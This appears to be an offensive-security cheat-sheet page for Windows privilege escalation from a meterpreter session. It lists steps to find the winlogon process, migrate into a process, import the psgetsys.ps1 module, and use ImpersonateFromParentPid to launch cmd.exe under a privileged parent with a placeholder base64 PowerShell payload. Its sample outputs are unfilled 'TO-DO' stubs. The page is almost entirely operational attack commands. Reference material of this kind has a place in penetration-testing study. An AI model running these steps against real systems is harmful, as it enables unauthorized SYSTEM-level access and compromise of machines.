Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Tools
# Inside meterpreter
ps winlogon
Sample Output:
TO-DO# Explorer.exe is a good candidate
migrate <PID>
Sample Output:
TO-DO# Import module
. .\psgetsys.ps1
Sample Output:
TO-DOImpersonateFromParentPid -ppid <PID> -command "c:\windows\system32\cmd.exe" -cmdargs "/c <POWERSHELL_3_BASE64>"
Sample Output:
TO-DORef: psgetsys